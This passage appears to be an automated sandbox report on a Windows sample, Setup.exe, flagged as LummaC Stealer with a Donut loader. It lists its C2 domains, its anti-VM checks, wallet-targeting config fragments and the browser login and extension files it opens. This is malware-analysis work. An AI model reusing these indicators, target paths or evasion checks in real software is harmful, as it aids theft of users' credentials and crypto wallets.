              Source: Setup.exe, 00000000.00000003.1968199543.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/apiR
              Source: Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/apiU
              Source: Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/apiV
              Source: Setup.exe, 00000000.00000003.1923253582.00000000014E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/apil
              Source: Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/bu
              Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/bu9
              Source: Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/lao
              Source: Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/op
              Source: Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/pi
              Source: Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/pijH
              Source: Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/s
              Source: Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click:443/api
              Source: Setup.exe, 00000000.00000003.1844311579.00000000041C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1844311579.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1844628829.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855827398.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855995799.0000000004176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1844628829.0000000004151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Setup.exe, 00000000.00000003.1844311579.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1844628829.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855827398.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855995799.0000000004176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1844628829.0000000004151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.4139966079.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Setup.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_014AC7F80_3_014AC7F8
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_014AC7F80_3_014AC7F8
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_014AC7F80_3_014AC7F8
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_014AC7F80_3_014AC7F8
              Source: Setup.exeStatic PE information: invalid certificate
              Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.4139966079.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Setup.exe, 00000000.00000003.1855888119.0000000004137000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1843325900.0000000004155000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exeVirustotal: Detection: 8%
              Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Setup.exeStatic file information: File size 74880677 > 1048576
              Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: E:\AWork\_drw_main\DRWIntelligentScan\bin\Release\Win32\EUImgRepair.pdb source: Setup.exe
              Source: Binary string: E:\AWork\_drw_main\DRWIntelligentScan\bin\Release\Win32\EUImgRepair.pdbOO+GCTL source: Setup.exe
              Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_014A682C push esi; retf 0_3_014A682F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_014A682C push esi; retf 0_3_014A682F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_014A682C push esi; retf 0_3_014A682F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_014A682C push esi; retf 0_3_014A682F
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 6064Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139549503.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Setup.exe, 00000000.00000002.4139721982.000000000145F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605856842.000000000145E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.0000000001462000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
              Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: locketsashayz.click
              Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959106248.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959123511.0000000004128000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968429859.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968454080.0000000004128000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6984, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Setup.exeString found in binary or memory: *electrum*
              Source: Setup.exeString found in binary or memory: llets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Wa
              Source: Setup.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets
              Source: Setup.exeString found in binary or memory: *exodus*
              Source: Setup.exeString found in binary or memory: *ethereum*
              Source: Setup.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Setup.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
